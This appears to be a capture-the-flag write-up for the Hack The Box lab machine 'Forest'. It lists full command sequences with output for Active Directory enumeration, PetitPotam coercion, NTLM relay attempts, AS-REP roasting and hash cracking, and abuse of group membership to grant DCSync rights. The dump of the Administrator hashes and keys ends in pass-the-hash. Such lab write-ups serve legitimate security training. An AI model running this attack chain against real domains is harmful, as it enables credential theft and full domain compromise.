Forest
Recon
nmap --open -T4 -p- 10.129.21.43
nmap -sVC -p53,135,389,445,593,5985,47001 10.129.21.43
# Starting Nmap 7.93 ( https://nmap.org ) at 2025-12-21 15:00 CET
# Nmap scan report for 10.129.21.43
# Host is up (0.034s latency).
# PORT STATE SERVICE VERSION
# 53/tcp open domain Simple DNS Plus
# 135/tcp open msrpc Microsoft Windows RPC
# 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
# 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
# 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
# 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-title: Not Found
# |_http-server-header: Microsoft-HTTPAPI/2.0
# 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-title: Not Found
# |_http-server-header: Microsoft-HTTPAPI/2.0
# Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
# Host script results:
# |_clock-skew: mean: 2h48m00s, deviation: 4h37m08s, median: 7m59s
# | smb2-security-mode:
# | 311:
# |_ Message signing enabled and required
# | smb-os-discovery:
# | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
# | Computer name: FOREST
# | NetBIOS computer name: FOREST\x00
# | Domain name: htb.local
# | Forest name: htb.local
# | FQDN: FOREST.htb.local
# |_ System time: 2025-12-21T06:08:33-08:00
# | smb2-time:
# | date: 2025-12-21T14:08:34
# |_ start_date: 2025-12-21T14:05:38
# | smb-security-mode:
# | account_used: <blank>
# | authentication_level: user
# | challenge_response: supported
# |_ message_signing: required
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done: 1 IP address (1 host up) scanned in 22.00 seconds
DNS
dig all "HTB.LOCAL" @10.129.21.43
# ; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> all HTB.LOCAL @10.129.21.43
# ;; QUESTION SECTION:
# ;HTB.LOCAL. IN A
# ;; ANSWER SECTION:
# HTB.LOCAL. 600 IN A 10.129.21.43
# HTB.LOCAL. 600 IN A 10.129.95.210
# ;; Query time: 30 msec
# ;; SERVER: 10.129.21.43#53(10.129.21.43) (UDP)
# ;; WHEN: Sun Dec 21 15:09:13 CET 2025
# ;; MSG SIZE rcvd: 82
RPC
rpcclient -U'%' FOREST
rpcclient $> querydominfo
# Domain: HTB
# Server:
# Comment:
# Total Users: 105
# Total Groups: 0
# Total Aliases: 0
# Sequence No: 1
# Force Logoff: -1
# Domain Server State: 0x1
# Server Role: ROLE_DOMAIN_PDC
# Unknown 3: 0x1
rpcclient $> getdompwinfo
# min_password_length: 7
# password_properties: 0x00000000
rpcclient $> enumdomusers
# user:[Administrator] rid:[0x1f4]
# user:[Guest] rid:[0x1f5]
# user:[krbtgt] rid:[0x1f6]
# user:[DefaultAccount] rid:[0x1f7]
# user:[$331000-VK4ADACQNUCA] rid:[0x463]
# user:[SM_2c8eef0a09b545acb] rid:[0x464]
# user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
# user:[SM_75a538d3025e4db9a] rid:[0x466]
# user:[SM_681f53d4942840e18] rid:[0x467]
# user:[SM_1b41c9286325456bb] rid:[0x468]
# user:[SM_9b69f1b9d2cc45549] rid:[0x469]
# user:[SM_7c96b981967141ebb] rid:[0x46a]
# user:[SM_c75ee099d0a64c91b] rid:[0x46b]
# user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
# user:[HealthMailboxc3d7722] rid:[0x46e]
# user:[HealthMailboxfc9daad] rid:[0x46f]
# user:[HealthMailboxc0a90c9] rid:[0x470]
# user:[HealthMailbox670628e] rid:[0x471]
# user:[HealthMailbox968e74d] rid:[0x472]
# user:[HealthMailbox6ded678] rid:[0x473]
# user:[HealthMailbox83d6781] rid:[0x474]
# user:[HealthMailboxfd87238] rid:[0x475]
# user:[HealthMailboxb01ac64] rid:[0x476]
# user:[HealthMailbox7108a4e] rid:[0x477]
# user:[HealthMailbox0659cc1] rid:[0x478]
# user:[sebastien] rid:[0x479]
# user:[lucinda] rid:[0x47a]
# user:[svc-alfresco] rid:[0x47b]
# user:[andy] rid:[0x47e]
# user:[mark] rid:[0x47f]
# user:[santi] rid:[0x480]
rpcdump.py -p 135 FOREST
# <SNIP>
# Protocol: N/A
# Provider: efssvc.dll
# UUID : 04EEB297-CBF4-466B-8A2A-BFD6A2F10BBA v1.0 EFSK RPC Interface
# Bindings:
# ncacn_np:\\FOREST[\pipe\efsrpc]
# ncalrpc:[LRPC-e5f53aa13aca071522]
# Protocol: N/A
# Provider: efssvc.dll
# UUID : DF1941C5-FE89-4E79-BF10-463657ACF44D v1.0 EFS RPC Interface
# Bindings:
# ncacn_np:\\FOREST[\pipe\efsrpc]
# ncalrpc:[LRPC-e5f53aa13aca071522]
# <SNIP>
The machine is vulnerable to coercion, let's confirm with netexec.
SMB
nxc smb "FOREST" -u '' -p '' -M coerce_plus
# SMB 10.129.21.43 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
# SMB 10.129.21.43 445 FOREST [+] htb.local\:
# COERCE_PLUS 10.129.21.43 445 FOREST VULNERABLE, PetitPotam
We have siging enabled and SMBv1 is available, and coerce_plus confirms the vulnerability.
Attemption to coerce
petitpotam.py -d "htb.local" 10.10.15.34 10.129.21.43
# ___ _ _ _ ___ _
# | _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
# | _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
# _|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
# _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
# "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
# PoC to elicit machine account authentication via some MS-EFSRPC functions
# by topotam (@topotam77)
# Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
# Trying pipe lsarpc
# [-] Connecting to ncacn_np:10.129.21.43[\PIPE\lsarpc]
# [+] Connected!
# [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
# [+] Successfully bound!
# [-] Sending EfsRpcOpenFileRaw!
# [+] Got expected ERROR_BAD_NETPATH exception!!
# [+] Attack worked!
responder -I tun0 -dA
# [+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
# [SMB] NTLMv2-SSP Client : 10.129.21.43
# [SMB] NTLMv2-SSP Username : HTB\FOREST$
# [SMB] NTLMv2-SSP Hash : FOREST$::HTB:1122334455667788:<SNIP>
^C
cp /opt/tools/Responder/logs/SMB-NTLMv2-SSP-10.129.21.43.txt .
hashcat -m 5600 -a 0 SMB-NTLMv2-SSP-10.129.21.43.txt `fzf-wordlists`
Could not crack it. Instead let's try relaying:
nxc ldap "10.129.21.43" -u '' -p ''
# LDAP 10.129.21.43 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local) (signing:None) (channel binding:No TLS cert)
# LDAP 10.129.21.43 389 FOREST [+] htb.local\:
SMB has signing enabled but LDAP does not, we can try to relay though it might fail.
ntlmrelayx -t ldap://10.129.95.210 -smb2support --interactive
Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
# [*] Servers started, waiting for connections
petitpotam.py -d "htb.local" 10.10.15.34 10.129.21.43
# <SNIP>
# [*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.21.43, attacking target ldap://10.129.21.43
# [!] The client requested signing. Relaying to LDAP will not work! (This usually happens when relaying from SMB to LDAP)
# [-] Authenticating against ldap://10.129.21.43 as HTB/FOREST$ FAILED
There is no IIS to try and relay trough HTTP.
Cross machine auth using the second IP I found in DNS doesn't work either.
Retrieve AS-REP hash for svc-alfresco
I had the list of users via RPC:
GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -usersfile users.txt -dc-ip 10.129.21.43 htb.local/
# Impacket v0.13.0.dev0+20250717.182627.84ebce48 - Copyright Fortra, LLC and its affiliated companies
# [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
# [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
# $krb5asrep$23$svc-alfresco@HTB.LOCAL:<SNIP>
# [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
# [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
hashcat -m 18200 -a 0 ASREProastables.txt `fzf-wordlists`
# <SNIP>
# $krb5asrep$23$svc-alfresco@HTB.LOCAL:<SNIP>:s3rvice
# Session..........: hashcat
# Status...........: Cracked
# <SNIP>
# Started: Sun Dec 21 15:57:01 2025
# Stopped: Sun Dec 21 15:57:19 2025
nxc smb 10.129.21.43 -u svc-alfresco -p s3rvice --shares
# SMB 10.129.21.43 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
# SMB 10.129.21.43 445 FOREST [+] htb.local\svc-alfresco:s3rvice
# SMB 10.129.21.43 445 FOREST [*] Enumerated shares
# SMB 10.129.21.43 445 FOREST Share Permissions Remark
# SMB 10.129.21.43 445 FOREST ----- ----------- ------
# SMB 10.129.21.43 445 FOREST ADMIN$ Remote Admin
# SMB 10.129.21.43 445 FOREST C$ Default share
# SMB 10.129.21.43 445 FOREST IPC$ READ Remote IPC
# SMB 10.129.21.43 445 FOREST NETLOGON READ Logon server share
# SMB 10.129.21.43 445 FOREST SYSVOL READ Logon server share
nxc winrm 10.129.21.43 -u svc-alfresco -p s3rvice
# WINRM 10.129.21.43 5985 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
# WINRM 10.129.21.43 5985 FOREST [+] htb.local\svc-alfresco:s3rvice (admin)
svc-alfresco can auth via winrm, logging in we find the user flag.
Root
Nothing more of interest, WinDef seems to be enabled.
Forest hints towards AD forests, though PowerView will get quarantined by WinDef.
Let's try bloodhound first:
faketime "$(rdate -n FOREST -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
nxc ldap 10.129.21.43 -u svc-alfresco -p s3rvice --bloodhound -c All --dns-server 10.129.21.43
# LDAP 10.129.21.43 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local) (signing:None) (channel binding:No TLS cert)
# LDAP 10.129.21.43 389 FOREST [+] htb.local\svc-alfresco:s3rvice
# LDAP 10.129.21.43 389 FOREST Resolved collection methods: psremote, acl, rdp, container, session, trusts, dcom, objectprops, localadmin, group
# LDAP 10.129.21.43 389 FOREST Done in 0M 12S
# LDAP 10.129.21.43 389 FOREST Compressing output into /root/.nxc/logs/FOREST_10.129.21.43_2025-12-21_161524_bloodhound.zip
I tested uploading sharphound seems like WinDef doesn't care.
Administrator has a session on FOREST.
svc-alfresco is member of "Account Operators" which can genericAll on the entire domain.
Import-Module .\PowerView.ps1
Get-DomainTrust
Get-DomainTrustMapping
cmd /c 'netdom query /domain:firest.htb.local dc'
# The specified domain either does not exist or could not be contacted.
# The command failed to complete successfully.
cmd /c 'netdom query /domain:htb.local workstation'
# List of workstations with accounts in the domain:
# EXCH01 ( Workstation or Server )
# The command completed successfully.
Idk if EXCH01 is relevant, we have GenericAll over it. Let's focus on Administrator having a session on FOREST
I can't see any forest or trust relationship, let's see if we can abuse our privileges and join "Exchange Windows Permissions", if that doesn't reveal anything new, we can still use it to perform a Shadow Credentials attack on FOREST.htb.local,
bloodyAD --host 10.129.21.43 -d htb.local -u svc-alfresco -p s3rvice add groupMember "EXCHANGE WINDOWS PERMISSIONS" svc-alfresco
# [+] svc-alfresco added to EXCHANGE WINDOWS PERMISSIONS
bloodyAD --host 10.129.21.43 -d htb.local -u 'svc-alfresco' -p 's3rvice' add dcsync 'svc-alfresco'
# [+] svc-alfresco is now able to DCSync
secretsdump -just-dc-user Administrator "htb.local/svc-alfresco:s3rvice@htb.local"
# Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
# [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
# [*] Using the DRSUAPI method to get NTDS.DIT secrets
# htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
# [*] Kerberos keys grabbed
# htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
# htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
# htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
# [*] Cleaning up...
Pass-the-Hash via winrm, get root.txt